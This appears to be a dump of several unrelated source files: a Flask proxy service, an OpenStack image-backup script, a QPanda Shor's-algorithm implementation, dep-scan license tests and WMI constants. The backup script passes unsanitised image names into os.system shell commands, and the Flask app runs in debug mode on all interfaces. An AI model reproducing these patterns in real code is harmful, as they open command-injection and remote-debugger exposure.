script = UpdateIfLowestScript(redis)
result = script.update_if_lowest("test-lua", 50)
assert result is True
assert redis.get("test-lua") == "50"
def test_update_if_lowest_unchanged(redis):
redis.set("test-lua", "100")
script = UpdateIfLowestScript(redis)
result = script.update_if_lowest("test-lua", "200")
assert result is False
assert redis.get("test-lua") == "100"
``` |
{
"source": "4hlberg/currenttime",
"score": 3
} |
#### File: currenttime/service/currenttime.py
```python
from flask import Flask, request, Response
import os
import requests
import logging
import json
import dotdictify
app = Flask(__name__)
logger = None
format_string = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
logger = logging.getLogger('currenttime-rest-service')
# Log to stdout
stdout_handler = logging.StreamHandler()
stdout_handler.setFormatter(logging.Formatter(format_string))
logger.addHandler(stdout_handler)
logger.setLevel(logging.DEBUG)
class DataAccess:
    # Main GET function; most requests will probably be routed here via the <path:path> rule
def __get_all_paged_entities(self, path, args):
logger.info("Fetching data from url: %s", path)
url = os.environ.get("base_url") + path
req = requests.get(url, headers={"Accept":"Application/json", "Authorization": "Basic " + os.environ.get('basic_token')})
if req.status_code != 200:
logger.error("Unexpected response status code: %d with response text %s" % (req.status_code, req.text))
raise AssertionError ("Unexpected response status code: %d with response text %s"%(req.status_code, req.text))
res = dotdictify.dotdictify(json.loads(req.text))
for entity in res['value']:
yield(entity)
logger.info('Returning entities')
def get_entities(self,path, args):
print("getting all entities")
return self.__get_all_paged_entities(path, args)
data_access_layer = DataAccess()
def stream_json(entities):
first = True
yield '['
for i, row in enumerate(entities):
if not first:
yield ','
else:
first = False
yield json.dumps(row)
yield ']'
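# For example (traced through the generator above):
#   ''.join(stream_json([{"a": 1}, {"b": 2}]))  ->  '[{"a": 1},{"b": 2}]'
# i.e. entities are emitted one by one inside a JSON array without building the
# whole list in memory first.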
@app.route("/<path:path>", methods=["GET", "POST"])
def get(path):
entities = data_access_layer.get_entities(path, args=request.args)
return Response(
stream_json(entities),
mimetype='application/json'
)
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0', threaded=True, port=os.environ.get('port',5000))
``` |
{
"source": "4hmedSamir/Openstack-Auto-Backup",
"score": 2
} |
#### File: 4hmedSamir/Openstack-Auto-Backup/main.py
```python
import os
from time import sleep
import subprocess
import logging
import glob
import db
import keystoneclient.v2_0.client as ksclient
from novaclient import client as novaclient
import glanceclient
from credentials import get_keystone_creds
from credentials import get_nova_creds
from dest_credentials import get_dest_keystone_creds
from dest_credentials import get_dest_nova_creds
class Auth(object):
def __init__(self):
self.kcreds = get_keystone_creds()
self.keystone = ksclient.Client(**self.kcreds)
self.ncreds = get_nova_creds()
self.nova = novaclient.Client("1.1",**self.ncreds)
self.glance_endpoint = self.keystone.service_catalog.url_for(service_type='image',endpoint_type='publicURL')
self.glance = glanceclient.Client('1',self.glance_endpoint, token=self.keystone.auth_token)
class Images(Auth):
script_path = os.path.dirname(os.path.abspath(__file__))
logfile = "{0}/dr.log".format(script_path)
logging.basicConfig(level=logging.INFO,format='%(asctime)s %(levelname)-8s %(message)s',datefmt='%a, %d %b %Y %H:%M:%S',filename=logfile)
def __init__(self):
super(Images, self).__init__()
self.servers = self.nova.servers.list()
self.mysql = db.Database()
def get_property(self,id):
property = self.glance.images.get(id)
return property
def backup_server(self,**kwargs):
"""Backup all running servers."""
self.nova.servers.backup(kwargs['server_id'], kwargs['backup_name'], kwargs['backup_type'], kwargs['rotation'])
def make_backup_dir(self):
if not os.path.exists("{0}/backups".format( self.script_path )):
os.makedirs("backups")
else: return
def prepared_list(self):
get_imags = self.glance.images.list()
get_servers = self.nova.servers.list()
images_names_list = []
for img in get_imags:
images_names_list.append(img.name)
servers_names_list = []
for srvr in get_servers:
servers_names_list.append(srvr.name+"_backup")
down_list = [elem for elem in images_names_list if elem in servers_names_list]
get_imags_casted = self.glance.images.list()
imagss_list = list(get_imags_casted)
result = []
for x in xrange(0,len(down_list)):
server_name = down_list[x]
for y in xrange(0,len(imagss_list)):
imgs_name = imagss_list[y].name
if server_name == imgs_name:
imgs_id = imagss_list[y].id
rs_img = {}
rs_img['name'] = imgs_name
rs_img['id'] = imgs_id
list_imgg = [rs_img]
get_img = self.glance.images.get(imgs_id)
while get_img.status != 'active':
sleep(5)
get_imgg = self.glance.images.get(imgs_id)
if get_imgg.status == 'active':
break
rs_img['disk_format'] = get_img.disk_format
rs_img['container_format'] = get_img.container_format
rs_img['is_public'] = get_img.is_public
rs_img['img_path'] = self.script_path+"/backups/"+imgs_name+".img"
rs_img['exc'] = self.script_path
result.append(list_imgg)
break
return result
def download_image(self,**kwargs):
"""Download images using glance client."""
image_name = kwargs['image_name'].replace (" ", "_")
try:
os.chdir(kwargs['down_path'])
except OSError as e:
logging.warning(e)
if kwargs['is_ami']:
if kwargs['aki']=='aki':
print "AKI"
cmd = "glance image-download %s >> %s-vmlinuz" %(kwargs['kernel_id'],image_name)
os.system(cmd)
if kwargs['ari']=='ari':
print "ARI"
cmd = "glance image-download %s >> %s-loader" %(kwargs['ramdisk_id'],image_name)
os.system(cmd)
print "AMI"
cmd = "glance image-download %s >> %s.img" %(kwargs['image_id'],image_name)
os.system(cmd)
else:
print"Not ami"
cmd = "glance image-download %s >> %s.img" %(kwargs['image_id'],image_name)
os.system(cmd)
def upload_img(self,**kwargs):
"""Upload image to destination glance."""
with open(kwargs['img_path']) as fimage:
self.glance.images.create(name=kwargs['img_name'], is_public=kwargs['is_public'], disk_format=kwargs['disk_format'],container_format=kwargs['container_format'], data=fimage)
def get_backup_id(self,images):
ids=[]
for x in xrange(0,len(images)):
ids.append(images[x][0]['id'])
return ids
def execute_backups(self,backup_list=None):
backup_vars = {}
if backup_list is None:
servers_list = self.nova.servers.list()
else:
servers_list = backup_list
for i in xrange(0,len(servers_list)):
check = self.mysql.check_image_exists(self.keystone.tenant_id, servers_list[i].id)
if not check :
logging.info("No servers")
if servers_list[i].status == 'ACTIVE':
backup_vars['server_id'] = servers_list[i].id
backup_vars['backup_name'] = "{0}_backup".format(servers_list[i].name)
backup_vars['backup_type'] = 'daily'
backup_vars['rotation'] = 1
self.backup_server(**backup_vars)
self.print_format("Backing up... {0}".format(servers_list[i].name ))
logging.info("Backing up... {0}".format(servers_list[i].name ))
self.mysql.insert_data(self.keystone.tenant_id,self.keystone.username,servers_list[i].id,'',servers_list[i].name)
else:
self.print_format("{0} is not active and will be ignored".format(servers_list[i].name ))
else:
logging.info("pass")
def update_backup(self,backup_list=None):
backup_vars = {}
if backup_list is None:
servers_list = self.nova.servers.list()
else:
servers_list = backup_list
for i in xrange(0,len(servers_list)):
if servers_list[i].status == 'ACTIVE':
backup_vars['server_id'] = servers_list[i].id
backup_vars['backup_name'] = "{0}_backup".format(servers_list[i].name)
backup_vars['backup_type'] = 'daily'
backup_vars['rotation'] = 1
self.backup_server(**backup_vars)
self.print_format("Backing up... {0}".format(servers_list[i].name ))
logging.info("Backing up... {0}".format(servers_list[i].name ))
self.mysql.insert_data(self.keystone.tenant_id,self.keystone.username,servers_list[i].id,'',servers_list[i].name)
else:
self.print_format("{0} is not active and will be ignored".format(servers_list[i].name ))
def print_format(self,string):
print "+%s+" %("-" * len(string))
print "|%s|" % string
print "+%s+" %("-" * len(string))
def get_meta_and_return_servers(self):
meta = []
_servers = self.nova.servers.list()
for srvrs in _servers:
rs = {}
gets = self.nova.servers.get(srvrs.id)
rs['dr'] = gets.metadata.values()
rs['id'] = srvrs.id
meta_list = [rs]
meta.append(meta_list)
res = [k for k in meta if '1' in k[0]['dr']]
servers =[]
for i in xrange(0,len(res)):
get_servers = self.nova.servers.get(res[i][0]['id'])
servers.append(get_servers)
return servers
if __name__ == "__main__":
obj=Images()
if not obj.prepared_list():
obj.print_format("First backup...")
if not obj.get_meta_and_return_servers():
logging.info("No custom servers list")
obj.execute_backups()
else:
logging.info("custom servers list with dr key")
obj.execute_backups(obj.get_meta_and_return_servers())
else:
obj.print_format("Updating backups...")
backup_list_index = obj.get_backup_id(obj.prepared_list())
for x in xrange(0,len( backup_list_index )):
obj.glance.images.delete(backup_list_index[x])
obj.mysql.delete_data(obj.keystone.tenant_id)
if not obj.get_meta_and_return_servers():
logging.info("No custom servers list")
obj.execute_backups()
else:
logging.info("custom servers list with dr key")
obj.execute_backups(obj.get_meta_and_return_servers())
``` |
{
"source": "4HMZ4/gAssistBot",
"score": 2
} |
#### File: gAssistBot/lib/getToken.py
```python
def getToken():
with open("./token", "r") as f:
token = f.read()
f.close()
return token
``` |
{
"source": "4ier/QPanda-2",
"score": 3
} |
#### File: QPanda-2/pyQPanda/ShorTest.py
```python
from pyqpanda import *
import matplotlib.pyplot as plt
import math as m
def plotBar(xdata, ydata):
fig, ax = plt.subplots()
fig.set_size_inches(6,6)
fig.set_dpi(100)
rects = ax.bar(xdata, ydata, color='b')
for rect in rects:
height = rect.get_height()
plt.text(rect.get_x() + rect.get_width() / 2, height, str(height), ha="center", va="bottom")
plt.rcParams['font.sans-serif']=['Arial']
plt.title("Origin Q", loc='right', alpha = 0.5)
plt.ylabel('Times')
plt.xlabel('States')
plt.show()
def reorganizeData(measure_qubits, quick_meausre_result):
xdata = []
ydata = []
for i in quick_meausre_result:
xdata.append(i)
ydata.append(quick_meausre_result[i])
return xdata, ydata
def gcd(m,n):
if not n:
return m
else:
return gcd(n, m%n)
def MAJ(a, b, c):
circ = QCircuit()
circ.insert(CNOT(c,b))
circ.insert(CNOT(c,a))
circ.insert(Toffoli(a, b, c))
return circ
# def Adder(a, b, c):
# circuit = CreateEmptyCircuit()
# nbit = len(a)
# circuit.insert(MAJ(c, a[0], b[0]))
# for i in range(1,nbit,1):
# circuit.insert(MAJ(b[i - 1], a[i], b[i]))
# for i in range(nbit-1,0, - 1):
# circuit.insert(MAJ(b[i - 1], a[i], b[i]))
# circuit.insert(UMA(c, a[0], b[0]))
# return circuit
def UMA(a, b, c):
circ = QCircuit()
circ.insert(Toffoli(a, b, c)).insert(CNOT(c, a)).insert(CNOT(a, b))
return circ
def MAJ2(a, b, c):
if ((len(a) == 0) or (len(a) != (len(b)))):
raise RuntimeError('a and b must be equal, but not equal to 0!')
nbit = len(a)
circ = QCircuit()
circ.insert(MAJ(c, a[0], b[0]))
for i in range(1, nbit):
circ.insert(MAJ(b[i-1], a[i], b[i]))
return circ
def Adder(a, b, c):
if ((len(a) == 0) or (len(a) != (len(b)))):
raise RuntimeError('a and b must be equal, but not equal to 0!')
nbit = len(a)
circ = QCircuit()
circ.insert(MAJ(c, a[0], b[0]))
for i in range(1, nbit):
circ.insert(MAJ(b[i-1], a[i], b[i]))
for i in range(nbit-1, 0, -1):
circ.insert(UMA(b[i-1], a[i], b[i]))
circ.insert(UMA(c, a[0], b[0]))
return circ
def isCarry(a, b, c, carry):
if ((len(a) == 0) or (len(a) != (len(b)))):
raise RuntimeError('a and b must be equal, but not equal to 0!')
circ = QCircuit()
circ.insert(MAJ2(a, b, c))
circ.insert(CNOT(b[-1], carry))
circ.insert(MAJ2(a, b, c).dagger())
return circ
def bindData(qlist, data):
check_value = 1 << len(qlist)
if (data >= check_value):
raise RuntimeError('data >= check_value')
circ = QCircuit()
i = 0
while (data >= 1):
if (data % 2) == 1:
circ.insert(X(qlist[i]))
data = data >> 1
i = i+1
return circ
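# For example, bindData(qlist, 5) applies X to qlist[0] and qlist[2]
# (5 = 0b101), i.e. the integer is loaded little-endian onto the qubits.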
def constModAdd(qa, C, M, qb, qs1):
circ = QCircuit()
q_num = len(qa)
tmp_value = (1 << q_num) - M + C
circ.insert(bindData(qb, tmp_value))
circ.insert(isCarry(qa, qb, qs1[1], qs1[0]))
circ.insert(bindData(qb, tmp_value))
tmp_circ = QCircuit()
tmp_circ.insert(bindData(qb, tmp_value))
tmp_circ.insert(Adder(qa, qb, qs1[1]))
tmp_circ.insert(bindData(qb, tmp_value))
tmp_circ = tmp_circ.control([qs1[0]])
circ.insert(tmp_circ)
circ.insert(X(qs1[0]))
tmp2_circ = QCircuit()
tmp2_circ.insert(bindData(qb, C))
tmp2_circ.insert(Adder(qa, qb, qs1[1]))
tmp2_circ.insert(bindData(qb, C))
tmp2_circ = tmp2_circ.control([qs1[0]])
circ.insert(tmp2_circ)
circ.insert(X(qs1[0]))
tmp_value = (1 << q_num) - C
circ.insert(bindData(qb, tmp_value))
circ.insert(isCarry(qa, qb, qs1[1], qs1[0]))
circ.insert(bindData(qb, tmp_value))
circ.insert(X(qs1[0]))
return circ
def modreverse(c, m):
if (c == 0):
raise RecursionError('c is zero!')
if (c == 1):
return 1
m1 = m
quotient = []
quo = m // c
remainder = m % c
quotient.append(quo)
while (remainder != 1):
m = c
c = remainder
quo = m // c
remainder = m % c
quotient.append(quo)
if (len(quotient) == 1):
return m - quo
if (len(quotient) == 2):
return 1 + quotient[0]*quotient[1]
rev1 = 1
rev2 = quotient[-1]
reverse_list = quotient[0:-1]
reverse_list.reverse()
for i in reverse_list:
rev1 = rev1 + rev2 * i
temp = rev1
rev1 = rev2
rev2 = temp
if ((len(quotient) % 2) == 0):
return rev2
return m1 - rev2
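# Example: modreverse(7, 15) == 13, since 7 * 13 = 91 and 91 % 15 == 1,
# i.e. it returns the modular multiplicative inverse of c modulo m.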
def constModMul(qa, const_num, M, qs1, qs2, qs3):
circ = QCircuit()
q_num = len(qa)
for i in range(0, q_num):
tmp_circ = QCircuit()
tmp = const_num * pow(2, i) %M
tmp_circ.insert(constModAdd(qs1, tmp, M, qs2, qs3))
tmp_circ = tmp_circ.control([qa[i]])
circ.insert(tmp_circ)
#state swap
for i in range(0, q_num):
circ.insert(CNOT(qa[i], qs1[i]))
circ.insert(CNOT(qs1[i], qa[i]))
circ.insert(CNOT(qa[i], qs1[i]))
Crev = modreverse(const_num, M)
tmp2_circ = QCircuit()
for i in range(0, q_num):
tmp = Crev* pow(2, i)
tmp = tmp % M
tmp_circ = QCircuit()
tmp_circ.insert(constModAdd(qs1, tmp, M, qs2, qs3))
tmp_circ = tmp_circ.control([qa[i]])
tmp2_circ.insert(tmp_circ)
circ.insert(tmp2_circ.dagger())
return circ
def constModExp(qa, qb, base, M, qs1, qs2, qs3):
circ = QCircuit()
cqnum = len(qa)
temp = base
for i in range(0, cqnum):
circ.insert(constModMul(qb, temp, M, qs1, qs2, qs3).control([qa[i]]))
temp = temp * temp
temp = temp % M
return circ
def qft(qlist):
circ = QCircuit()
qnum = len(qlist)
for i in range(0, qnum):
circ.insert(H(qlist[qnum-1-i]))
for j in range(i + 1, qnum):
circ.insert(CR(qlist[qnum-1-j], qlist[qnum-1-i], m.pi/(1 << (j-i))))
for i in range(0, qnum//2):
circ.insert(CNOT(qlist[i], qlist[qnum-1-i]))
circ.insert(CNOT(qlist[qnum-1-i], qlist[i]))
circ.insert(CNOT(qlist[i], qlist[qnum-1-i]))
return circ
def shorAlg(base, M):
    if ((base < 2) or (base > M - 1)):
        raise ValueError('Invalid base!')
    if (gcd(base, M) != 1):
        raise ValueError('Invalid base! base and M must be mutually prime')
binary_len = 0
while M >> binary_len != 0 :
binary_len = binary_len + 1
machine = init_quantum_machine(QMachineType.CPU_SINGLE_THREAD)
qa = machine.qAlloc_many(binary_len*2)
qb = machine.qAlloc_many(binary_len)
qs1 = machine.qAlloc_many(binary_len)
qs2 = machine.qAlloc_many(binary_len)
qs3 = machine.qAlloc_many(2)
prog = QProg()
prog.insert(X(qb[0]))
prog.insert(single_gate_apply_to_all(H, qa))
prog.insert(constModExp(qa, qb, base, M, qs1, qs2, qs3))
prog.insert(qft(qa).dagger())
directly_run(prog)
result = quick_measure(qa, 100)
print(result)
xdata, ydata = reorganizeData(qa, result)
plotBar(xdata, ydata)
return result
if __name__=="__main__":
base = 2
N = 15
shorAlg(base, N)
``` |
{
"source": "4jinetes/dep-scan",
"score": 2
} |
#### File: dep-scan/test/test_license.py
```python
import os
import pytest
from depscan.lib.bom import get_pkg_list
from depscan.lib.license import build_license_data, bulk_lookup
from depscan.lib import analysis as analysis
@pytest.fixture
def test_license_data():
licenses_dir = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"..",
"vendor",
"choosealicense.com",
"_licenses",
)
spdx_license_list = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"..",
"vendor",
"spdx",
"json",
"licenses.json",
)
return build_license_data(licenses_dir, spdx_license_list)
def test_lookup(test_license_data):
test_bom = os.path.join(
os.path.dirname(os.path.realpath(__file__)), "data", "bom.xml"
)
pkg_list = get_pkg_list(test_bom)
pkg_lic_dict = bulk_lookup(test_license_data, pkg_list)
assert pkg_lic_dict
test_bom = os.path.join(
os.path.dirname(os.path.realpath(__file__)), "data", "bom-dotnet.xml"
)
pkg_list = get_pkg_list(test_bom)
pkg_lic_dict = bulk_lookup(test_license_data, pkg_list)
assert pkg_lic_dict
violations_list = []
for pkg, ll in pkg_lic_dict.items():
for lic in ll:
if lic["condition_flag"]:
violations_list.append(lic)
assert len(violations_list) == 1
def test_dual_license(test_license_data):
pkg_lic_dict = bulk_lookup(
test_license_data,
[
{
"vendor": "npm",
"name": "jszip",
"version": "3.2.2",
"licenses": ["(MIT OR GPL-3.0)"],
}
],
)
assert pkg_lic_dict == {
"npm:[email protected]": [
{
"title": "MIT License",
"spdx-id": "MIT",
"featured": True,
"hidden": False,
"description": "A short and simple permissive license with conditions only requiring preservation of copyright and license notices. Licensed works, modifications, and larger works may be distributed under different terms and without source code.",
"how": "Create a text file (typically named LICENSE or LICENSE.txt) in the root of your source code and copy the text of the license into the file. Replace [year] with the current year and [fullname] with the name (or names) of the copyright holders.",
"using": {
"Babel": "https://github.com/babel/babel/blob/master/LICENSE",
".NET Core": "https://github.com/dotnet/runtime/blob/master/LICENSE.TXT",
"Rails": "https://github.com/rails/rails/blob/master/MIT-LICENSE",
},
"permissions": [
"commercial-use",
"modifications",
"distribution",
"private-use",
],
"conditions": ["include-copyright"],
"limitations": ["liability", "warranty"],
"condition_flag": False,
}
]
}
test_bom = os.path.join(
os.path.dirname(os.path.realpath(__file__)), "data", "bom-node2.xml"
)
pkg_list = get_pkg_list(test_bom)
pkg_lic_dict = bulk_lookup(test_license_data, pkg_list)
assert pkg_lic_dict
def test_large_lookup(test_license_data):
test_bom = os.path.join(
os.path.dirname(os.path.realpath(__file__)), "data", "bom-docker.json"
)
pkg_list = get_pkg_list(test_bom)
pkg_lic_dict = bulk_lookup(test_license_data, pkg_list)
assert pkg_lic_dict
analysis.analyse_licenses("nodejs", pkg_lic_dict)
def test_unvendor_license(test_license_data):
pkg_lic_dict = bulk_lookup(
test_license_data,
[
{
"vendor": "npm",
"name": "jszip",
"version": "3.2.2",
"licenses": ["CC-BY-NC-1.0"],
}
],
)
assert pkg_lic_dict == {
"npm:[email protected]": [
{
"title": "Creative Commons Attribution Non Commercial 1.0 Generic",
"spdx-id": "CC-BY-NC-1.0",
"osi_approved": False,
"fsf_libre": False,
"conditions": ["See https://spdx.org/licenses/CC-BY-NC-1.0.json"],
"condition_flag": True,
}
]
}
``` |
{
"source": "4k1/wufuzzer",
"score": 2
} |
#### File: wufuzzer/src/config.py
```python
import yaml
class ConfigFile():
yml = None
last_confid = "default"
def get_yml(self):
return self.yml
def load_config(self):
confs = []
# load config
try:
f = open("wufuzzer.yml")
self.yml = yaml.load(f, Loader=yaml.SafeLoader)
f.close()
except:
print ("[-] Missing config to read 'wufuzzer.yml'.")
exit(-1)
# check version
if str(self.get_config("version", "1")) != "2":
print ("[-] Configuration 'wufuzzer.yml' version mismatch. version = " + str(get_config("version", "1")))
exit(-1)
def get_config(self, key, default=None):
if key in self.yml["core"]:
if type(self.yml["core"][key]) is int:
return int(self.yml["core"][key])
else:
return str(self.yml["core"][key])
        elif default is None:
            raise KeyError(key)
else:
return default
def is_exists_user_config(self, confid):
try:
_ = self.yml["config"][confid]
self.last_confid = confid
return True
except:
return False
def get_user_config(self, key, default=None):
if self.yml["config"][self.last_confid] == None:
None
elif key in self.yml["config"][self.last_confid]:
return self.yml["config"][self.last_confid][key]
if default == None:
raise
else:
return default
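    # The methods above assume a wufuzzer.yml shaped roughly like this
    # (an assumption inferred from the keys accessed, not a documented format):
    #
    #   version: 2
    #   core:
    #     <key>: <value>
    #   config:
    #     default:
    #       <key>: <value>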
``` |
{
"source": "4k4xs4pH1r3/cWMI",
"score": 2
} |
#### File: cWMI/cwmi/winapi.py
```python
import ctypes
from ctypes import wintypes
from .wintype import HRESULT, BSTR
PSHORT = ctypes.POINTER(wintypes.SHORT)
PUSHORT = ctypes.POINTER(wintypes.USHORT)
LPLONG = ctypes.POINTER(wintypes.LONG)
PULONG = ctypes.POINTER(wintypes.ULONG)
CHAR = ctypes.c_char
PCHAR = ctypes.POINTER(CHAR)
_In_ = 1
_Out_ = 2
WBEM_FLAG_RETURN_IMMEDIATELY = 0x10
WBEM_FLAG_RETURN_WBEM_COMPLETE = 0
WBEM_FLAG_BIDIRECTIONAL = 0
WBEM_FLAG_FORWARD_ONLY = 0x20
WBEM_FLAG_NO_ERROR_OBJECT = 0x40
WBEM_FLAG_RETURN_ERROR_OBJECT = 0
WBEM_FLAG_SEND_STATUS = 0x80
WBEM_FLAG_DONT_SEND_STATUS = 0
WBEM_FLAG_ENSURE_LOCATABLE = 0x100
WBEM_FLAG_DIRECT_READ = 0x200
WBEM_FLAG_SEND_ONLY_SELECTED = 0
WBEM_RETURN_WHEN_COMPLETE = 0
WBEM_RETURN_IMMEDIATELY = 0x10
WBEM_MASK_RESERVED_FLAGS = 0x1f000
WBEM_FLAG_USE_AMENDED_QUALIFIERS = 0x20000
WBEM_FLAG_STRONG_VALIDATION = 0x10000
WBEM_NO_WAIT = 0
WBEM_INFINITE = 0xFFFFFFFF
WBEM_FLAG_ALWAYS = 0
WBEM_FLAG_ONLY_IF_TRUE = 0x1
WBEM_FLAG_ONLY_IF_FALSE = 0x2
WBEM_FLAG_ONLY_IF_IDENTICAL = 0x3
WBEM_MASK_PRIMARY_CONDITION = 0x3
WBEM_FLAG_KEYS_ONLY = 0x4
WBEM_FLAG_REFS_ONLY = 0x8
WBEM_FLAG_LOCAL_ONLY = 0x10
WBEM_FLAG_PROPAGATED_ONLY = 0x20
WBEM_FLAG_SYSTEM_ONLY = 0x30
WBEM_FLAG_NONSYSTEM_ONLY = 0x40
WBEM_MASK_CONDITION_ORIGIN = 0x70
WBEM_FLAG_CLASS_OVERRIDES_ONLY = 0x100
WBEM_FLAG_CLASS_LOCAL_AND_OVERRIDES = 0x200
WBEM_MASK_CLASS_CONDITION = 0x300
WBEM_NO_ERROR = 0
WBEM_S_NO_ERROR = 0
WBEM_S_SAME = 0
WBEM_S_FALSE = 1
WBEM_S_ALREADY_EXISTS = 0x40001
WBEM_S_RESET_TO_DEFAULT = 0x40002
WBEM_S_DIFFERENT = 0x40003
WBEM_S_TIMEDOUT = 0x40004
WBEM_S_NO_MORE_DATA = 0x40005
WBEM_S_OPERATION_CANCELLED = 0x40006
WBEM_S_PENDING = 0x40007
WBEM_S_DUPLICATE_OBJECTS = 0x40008
WBEM_S_ACCESS_DENIED = 0x40009
WBEM_S_PARTIAL_RESULTS = 0x40010
WBEM_S_SOURCE_NOT_AVAILABLE = 0x40017
WBEM_E_FAILED = 0x80041001
WBEM_E_NOT_FOUND = 0x80041002
WBEM_E_ACCESS_DENIED = 0x80041003
WBEM_E_PROVIDER_FAILURE = 0x80041004
WBEM_E_TYPE_MISMATCH = 0x80041005
WBEM_E_OUT_OF_MEMORY = 0x80041006
WBEM_E_INVALID_CONTEXT = 0x80041007
WBEM_E_INVALID_PARAMETER = 0x80041008
WBEM_E_NOT_AVAILABLE = 0x80041009
WBEM_E_CRITICAL_ERROR = 0x8004100a
WBEM_E_INVALID_STREAM = 0x8004100b
WBEM_E_NOT_SUPPORTED = 0x8004100c
WBEM_E_INVALID_SUPERCLASS = 0x8004100d
WBEM_E_INVALID_NAMESPACE = 0x8004100e
WBEM_E_INVALID_OBJECT = 0x8004100f
WBEM_E_INVALID_CLASS = 0x80041010
WBEM_E_PROVIDER_NOT_FOUND = 0x80041011
WBEM_E_INVALID_PROVIDER_REGISTRATION = 0x80041012
WBEM_E_PROVIDER_LOAD_FAILURE = 0x80041013
WBEM_E_INITIALIZATION_FAILURE = 0x80041014
WBEM_E_TRANSPORT_FAILURE = 0x80041015
WBEM_E_INVALID_OPERATION = 0x80041016
WBEM_E_INVALID_QUERY = 0x80041017
WBEM_E_INVALID_QUERY_TYPE = 0x80041018
WBEM_E_ALREADY_EXISTS = 0x80041019
WBEM_E_OVERRIDE_NOT_ALLOWED = 0x8004101a
WBEM_E_PROPAGATED_QUALIFIER = 0x8004101b
WBEM_E_PROPAGATED_PROPERTY = 0x8004101c
WBEM_E_UNEXPECTED = 0x8004101d
WBEM_E_ILLEGAL_OPERATION = 0x8004101e
WBEM_E_CANNOT_BE_KEY = 0x8004101f
WBEM_E_INCOMPLETE_CLASS = 0x80041020
WBEM_E_INVALID_SYNTAX = 0x80041021
WBEM_E_NONDECORATED_OBJECT = 0x80041022
WBEM_E_READ_ONLY = 0x80041023
WBEM_E_PROVIDER_NOT_CAPABLE = 0x80041024
WBEM_E_CLASS_HAS_CHILDREN = 0x80041025
WBEM_E_CLASS_HAS_INSTANCES = 0x80041026
WBEM_E_QUERY_NOT_IMPLEMENTED = 0x80041027
WBEM_E_ILLEGAL_NULL = 0x80041028
WBEM_E_INVALID_QUALIFIER_TYPE = 0x80041029
WBEM_E_INVALID_PROPERTY_TYPE = 0x8004102a
WBEM_E_VALUE_OUT_OF_RANGE = 0x8004102b
WBEM_E_CANNOT_BE_SINGLETON = 0x8004102c
WBEM_E_INVALID_CIM_TYPE = 0x8004102d
WBEM_E_INVALID_METHOD = 0x8004102e
WBEM_E_INVALID_METHOD_PARAMETERS = 0x8004102f
WBEM_E_SYSTEM_PROPERTY = 0x80041030
WBEM_E_INVALID_PROPERTY = 0x80041031
WBEM_E_CALL_CANCELLED = 0x80041032
WBEM_E_SHUTTING_DOWN = 0x80041033
WBEM_E_PROPAGATED_METHOD = 0x80041034
WBEM_E_UNSUPPORTED_PARAMETER = 0x80041035
WBEM_E_MISSING_PARAMETER_ID = 0x80041036
WBEM_E_INVALID_PARAMETER_ID = 0x80041037
WBEM_E_NONCONSECUTIVE_PARAMETER_IDS = 0x80041038
WBEM_E_PARAMETER_ID_ON_RETVAL = 0x80041039
WBEM_E_INVALID_OBJECT_PATH = 0x8004103a
WBEM_E_OUT_OF_DISK_SPACE = 0x8004103b
WBEM_E_BUFFER_TOO_SMALL = 0x8004103c
WBEM_E_UNSUPPORTED_PUT_EXTENSION = 0x8004103d
WBEM_E_UNKNOWN_OBJECT_TYPE = 0x8004103e
WBEM_E_UNKNOWN_PACKET_TYPE = 0x8004103f
WBEM_E_MARSHAL_VERSION_MISMATCH = 0x80041040
WBEM_E_MARSHAL_INVALID_SIGNATURE = 0x80041041
WBEM_E_INVALID_QUALIFIER = 0x80041042
WBEM_E_INVALID_DUPLICATE_PARAMETER = 0x80041043
WBEM_E_TOO_MUCH_DATA = 0x80041044
WBEM_E_SERVER_TOO_BUSY = 0x80041045
WBEM_E_INVALID_FLAVOR = 0x80041046
WBEM_E_CIRCULAR_REFERENCE = 0x80041047
WBEM_E_UNSUPPORTED_CLASS_UPDATE = 0x80041048
WBEM_E_CANNOT_CHANGE_KEY_INHERITANCE = 0x80041049
WBEM_E_CANNOT_CHANGE_INDEX_INHERITANCE = 0x80041050
WBEM_E_TOO_MANY_PROPERTIES = 0x80041051
WBEM_E_UPDATE_TYPE_MISMATCH = 0x80041052
WBEM_E_UPDATE_OVERRIDE_NOT_ALLOWED = 0x80041053
WBEM_E_UPDATE_PROPAGATED_METHOD = 0x80041054
WBEM_E_METHOD_NOT_IMPLEMENTED = 0x80041055
WBEM_E_METHOD_DISABLED = 0x80041056
WBEM_E_REFRESHER_BUSY = 0x80041057
WBEM_E_UNPARSABLE_QUERY = 0x80041058
WBEM_E_NOT_EVENT_CLASS = 0x80041059
WBEM_E_MISSING_GROUP_WITHIN = 0x8004105a
WBEM_E_MISSING_AGGREGATION_LIST = 0x8004105b
WBEM_E_PROPERTY_NOT_AN_OBJECT = 0x8004105c
WBEM_E_AGGREGATING_BY_OBJECT = 0x8004105d
WBEM_E_UNINTERPRETABLE_PROVIDER_QUERY = 0x8004105f
WBEM_E_BACKUP_RESTORE_WINMGMT_RUNNING = 0x80041060
WBEM_E_QUEUE_OVERFLOW = 0x80041061
WBEM_E_PRIVILEGE_NOT_HELD = 0x80041062
WBEM_E_INVALID_OPERATOR = 0x80041063
WBEM_E_LOCAL_CREDENTIALS = 0x80041064
WBEM_E_CANNOT_BE_ABSTRACT = 0x80041065
WBEM_E_AMENDED_OBJECT = 0x80041066
WBEM_E_CLIENT_TOO_SLOW = 0x80041067
WBEM_E_NULL_SECURITY_DESCRIPTOR = 0x80041068
WBEM_E_TIMED_OUT = 0x80041069
WBEM_E_INVALID_ASSOCIATION = 0x8004106a
WBEM_E_AMBIGUOUS_OPERATION = 0x8004106b
WBEM_E_QUOTA_VIOLATION = 0x8004106c
WBEM_E_RESERVED_001 = 0x8004106d
WBEM_E_RESERVED_002 = 0x8004106e
WBEM_E_UNSUPPORTED_LOCALE = 0x8004106f
WBEM_E_HANDLE_OUT_OF_DATE = 0x80041070
WBEM_E_CONNECTION_FAILED = 0x80041071
WBEM_E_INVALID_HANDLE_REQUEST = 0x80041072
WBEM_E_PROPERTY_NAME_TOO_WIDE = 0x80041073
WBEM_E_CLASS_NAME_TOO_WIDE = 0x80041074
WBEM_E_METHOD_NAME_TOO_WIDE = 0x80041075
WBEM_E_QUALIFIER_NAME_TOO_WIDE = 0x80041076
WBEM_E_RERUN_COMMAND = 0x80041077
WBEM_E_DATABASE_VER_MISMATCH = 0x80041078
WBEM_E_VETO_DELETE = 0x80041079
